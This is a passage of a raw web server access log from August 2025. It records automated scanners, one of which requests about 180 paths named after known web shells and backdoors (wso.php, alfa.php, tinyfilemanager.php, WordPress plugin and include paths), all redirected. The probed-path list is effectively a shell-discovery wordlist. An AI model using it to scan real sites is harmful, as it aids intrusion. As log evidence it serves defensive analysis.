/Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 52.23.225.234 - - [12/Aug/2025:09:30:07 -0400] "GET /xmlrpc.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 69.171.249.113 - - [12/Aug/2025:09:35:00 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 173.252.95.45 - - [12/Aug/2025:09:35:37 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 68.183.245.101 - - [12/Aug/2025:09:42:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:09:42:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:09:42:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:09:42:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:09:42:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:09:42:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:09:42:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:09:42:19 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:09:44:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:09:44:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:09:44:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:09:44:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 69.171.230.116 - - [12/Aug/2025:09:46:05 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 146.190.11.185 - - [12/Aug/2025:09:46:08 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:09:46:08 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:09:46:08 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:09:46:08 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:09:49:39 -0400] "GET /wp-admin/css/colors/light/admin.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 52.138.207.229 - - [12/Aug/2025:09:50:35 -0400] "GET /.alf.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:35 -0400] "GET /.bod/.ll/ss.php HTTP/1.1" 301 246 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:36 -0400] "GET /.well-known/about/function.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:36 -0400] "GET /.well-known/classwithtostring.php HTTP/1.1" 301 264 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:36 -0400] "GET /.well-known/index.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:36 -0400] "GET /.well-known/radio.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:37 -0400] "GET /10.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:37 -0400] "GET /12.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:37 -0400] "GET /13k.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:37 -0400] "GET /87.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:38 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:38 -0400] "GET /about/Geforce.php HTTP/1.1" 301 248 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:38 -0400] "GET /about/function.php HTTP/1.1" 301 249 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:38 -0400] "GET /admin.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:39 -0400] "GET /admin/admin.php HTTP/1.1" 301 246 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:39 -0400] "GET /admin/function.php HTTP/1.1" 301 249 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:39 -0400] "GET /admin/index.php HTTP/1.1" 301 246 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:40 -0400] "GET /adminfuns.php HTTP/1.1" 301 244 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:40 -0400] "GET /akc.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:40 -0400] "GET /al.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:40 -0400] "GET /alfa.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:41 -0400] "GET /as.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:41 -0400] "GET /asasx.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:41 -0400] "GET /assets/images/doc.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:41 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:42 -0400] "GET /auth.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:42 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:42 -0400] "GET /autoload_classmap/function.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:42 -0400] "GET /b.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:43 -0400] "GET /blog/fw.php HTTP/1.1" 301 242 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:43 -0400] "GET /bugz.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:43 -0400] "GET /byp.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:43 -0400] "GET /cc.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:44 -0400] "GET /chosen.php HTTP/1.1" 301 241 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:44 -0400] "GET /class.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:44 -0400] "GET /classwithtostring.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:45 -0400] "GET /composer.php HTTP/1.1" 301 243 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:45 -0400] "GET /css.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:45 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:45 -0400] "GET /edit.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:46 -0400] "GET /f35.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:46 -0400] "GET /file.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:46 -0400] "GET /file2.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:46 -0400] "GET /filemanager.php HTTP/1.1" 301 246 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:47 -0400] "GET /files/index.php HTTP/1.1" 301 246 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:47 -0400] "GET /fix.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:47 -0400] "GET /flower.php HTTP/1.1" 301 241 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:47 -0400] "GET /fox.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:48 -0400] "GET /function/function.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:48 -0400] "GET /g.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:48 -0400] "GET /gecko.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:48 -0400] "GET /gel4y.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:49 -0400] "GET /gelay.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:49 -0400] "GET /gg.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:49 -0400] "GET /goat.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:50 -0400] "GET /goods.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:50 -0400] "GET /h.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:50 -0400] "GET /images/admin.php HTTP/1.1" 301 247 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:50 -0400] "GET /images/class-config.php HTTP/1.1" 301 254 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:51 -0400] "GET /inc.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:51 -0400] "GET /index.bak.php HTTP/1.1" 301 244 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:51 -0400] "GET /index/function.php HTTP/1.1" 301 249 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:51 -0400] "GET /info.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:52 -0400] "GET /infos.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:52 -0400] "GET /ioxi-o.php HTTP/1.1" 301 241 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:52 -0400] "GET /k.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:52 -0400] "GET /m.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:53 -0400] "GET /mar.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:53 -0400] "GET /mini HTTP/1.1" 301 235 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:53 -0400] "GET /mini.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:53 -0400] "GET /mm.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:54 -0400] "GET /ms-edit.php HTTP/1.1" 301 242 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:54 -0400] "GET /ms-themes.php HTTP/1.1" 301 244 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:54 -0400] "GET /options-general.php HTTP/1.1" 301 250 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:55 -0400] "GET /options-reading.php HTTP/1.1" 301 250 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:55 -0400] "GET /options-writing.php HTTP/1.1" 301 250 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:55 -0400] "GET /ova.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:55 -0400] "GET /pages.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:56 -0400] "GET /php.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:56 -0400] "GET /php8.php HTTP/1.1" 301 239 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:56 -0400] "GET /pinfo.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:56 -0400] "GET /radio.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:57 -0400] "GET /robots.php HTTP/1.1" 301 241 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:57 -0400] "GET /rt.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:57 -0400] "GET /s.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:57 -0400] "GET /setup.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:58 -0400] "GET /simple.php HTTP/1.1" 301 241 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:58 -0400] "GET /sts.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:58 -0400] "GET /system_log.php HTTP/1.1" 301 245 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:58 -0400] "GET /test1.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:59 -0400] "GET /themes/zMousse/otuz1.php HTTP/1.1" 301 255 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:59 -0400] "GET /tinyfilemanager.php HTTP/1.1" 301 250 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:50:59 -0400] "GET /ty.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:00 -0400] "GET /users.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:00 -0400] "GET /w.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:00 -0400] "GET /wp-aa.php HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:00 -0400] "GET /wp-admin/ HTTP/1.1" 301 240 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:01 -0400] "GET /wp-admin/admin.php HTTP/1.1" 301 249 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:01 -0400] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:01 -0400] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 265 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:01 -0400] "GET /wp-admin/css/colors/ectoplasm/about.php HTTP/1.1" 301 270 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:02 -0400] "GET /wp-admin/css/colors/light/wp-login.php HTTP/1.1" 301 269 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:02 -0400] "GET /wp-admin/images/moon.php HTTP/1.1" 301 255 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:03 -0400] "GET /wp-admin/includes/colour.php HTTP/1.1" 301 259 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:03 -0400] "GET /wp-admin/includes/header.php HTTP/1.1" 301 259 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:03 -0400] "GET /wp-admin/includes/index.php HTTP/1.1" 301 258 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:03 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 251 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:04 -0400] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 301 264 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:04 -0400] "GET /wp-admin/js/index.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:04 -0400] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 301 260 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:04 -0400] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 301 260 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:05 -0400] "GET /wp-admin/mah.php HTTP/1.1" 301 247 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:05 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 255 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:05 -0400] "GET /wp-admin/network/network.php HTTP/1.1" 301 259 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:05 -0400] "GET /wp-admin/wp-admins.php HTTP/1.1" 301 253 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:06 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:06 -0400] "GET /wp-admin/wp.php HTTP/1.1" 301 246 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:06 -0400] "GET /wp-api.php HTTP/1.1" 301 241 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:06 -0400] "GET /wp-comments.php HTTP/1.1" 301 246 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:07 -0400] "GET /wp-content/1.php HTTP/1.1" 301 247 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:07 -0400] "GET /wp-content/about.php HTTP/1.1" 301 251 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:07 -0400] "GET /wp-content/autoload_classmap.php HTTP/1.1" 301 263 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:08 -0400] "GET /wp-content/classwithtostring.php HTTP/1.1" 301 263 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:08 -0400] "GET /wp-content/click.php HTTP/1.1" 301 251 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:08 -0400] "GET /wp-content/index.php HTTP/1.1" 301 251 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:08 -0400] "GET /wp-content/languages/autoload_classmap.php HTTP/1.1" 301 273 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:09 -0400] "GET /wp-content/plugin.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:09 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 275 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:09 -0400] "GET /wp-content/plugins/autoload_classmap.php HTTP/1.1" 301 271 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:09 -0400] "GET /wp-content/plugins/ioxi/ioxi/dropdown.php HTTP/1.1" 301 272 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:10 -0400] "GET /wp-content/plugins/pwnd/as.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:10 -0400] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 292 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:10 -0400] "GET /wp-content/plugins/up/main.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:10 -0400] "GET /wp-content/themes/admin.php HTTP/1.1" 301 258 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:11 -0400] "GET /wp-content/uploads/chosen.php HTTP/1.1" 301 260 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:11 -0400] "GET /wp-content/uploads/de_fb_uploads/b.php HTTP/1.1" 301 269 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:12 -0400] "GET /wp-content/uploads/json.php HTTP/1.1" 301 258 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:12 -0400] "GET /wp-content/wp.php HTTP/1.1" 301 248 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:12 -0400] "GET /wp-content/x.php HTTP/1.1" 301 247 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:12 -0400] "GET /wp-error.php HTTP/1.1" 301 243 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:13 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 273 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:13 -0400] "GET /wp-includes/IXR/autoload_classmap.php HTTP/1.1" 301 268 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:13 -0400] "GET /wp-includes/IXR/chosen.php HTTP/1.1" 301 257 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:13 -0400] "GET /wp-includes/PHPMailer/file.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:14 -0400] "GET /wp-includes/SimplePie/chosen.php HTTP/1.1" 301 263 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:14 -0400] "GET /wp-includes/about.php HTTP/1.1" 301 252 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:14 -0400] "GET /wp-includes/blocks/about.php HTTP/1.1" 301 259 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:15 -0400] "GET /wp-includes/blocks/calendar/index.php HTTP/1.1" 301 268 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:15 -0400] "GET /wp-includes/blocks/site-title/index.php HTTP/1.1" 301 270 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:15 -0400] "GET /wp-includes/certificates/chosen.php HTTP/1.1" 301 266 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:15 -0400] "GET /wp-includes/css/autoload_classmap.php HTTP/1.1" 301 268 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:16 -0400] "GET /wp-includes/fonts/admin.php HTTP/1.1" 301 258 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:16 -0400] "GET /wp-includes/fonts/autoload_classmap.php HTTP/1.1" 301 270 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:16 -0400] "GET /wp-includes/fonts/index.php HTTP/1.1" 301 258 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:16 -0400] "GET /wp-includes/html-api/about.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:17 -0400] "GET /wp-includes/js/tinymce/langs/about.php HTTP/1.1" 301 269 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:17 -0400] "GET /wp-includes/rest-api/index.php HTTP/1.1" 301 261 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:17 -0400] "GET /wp-includes/style-engine/autoload_classmap.php HTTP/1.1" 301 277 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:17 -0400] "GET /wp-includes/widgets/autoload_classmap.php HTTP/1.1" 301 272 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:18 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 255 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:18 -0400] "GET /wp-includes/wp_class_datlib.php HTTP/1.1" 301 262 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:18 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 243 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:18 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:19 -0400] "GET /wp-logs.php HTTP/1.1" 301 242 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:19 -0400] "GET /wp-setting.php HTTP/1.1" 301 245 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:19 -0400] "GET /wp-setup.php HTTP/1.1" 301 243 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:20 -0400] "GET /wp-signin.php HTTP/1.1" 301 244 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:20 -0400] "GET /wp-wso.php HTTP/1.1" 301 241 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:20 -0400] "GET /wp.php HTTP/1.1" 301 237 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:20 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 250 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:21 -0400] "GET /wsa.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:21 -0400] "GET /wso.php HTTP/1.1" 301 238 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:21 -0400] "GET /y.php HTTP/1.1" 301 236 "-" "-" 52.138.207.229 - - [12/Aug/2025:09:51:21 -0400] "GET /zwso.php HTTP/1.1" 301 239 "-" "-" 52.23.225.234 - - [12/Aug/2025:09:56:35 -0400] "GET /wp-admin/css/colors/modern/lofter.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 68.183.245.101 - - [12/Aug/2025:09:56:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:09:56:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:09:56:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:09:56:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:09:56:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 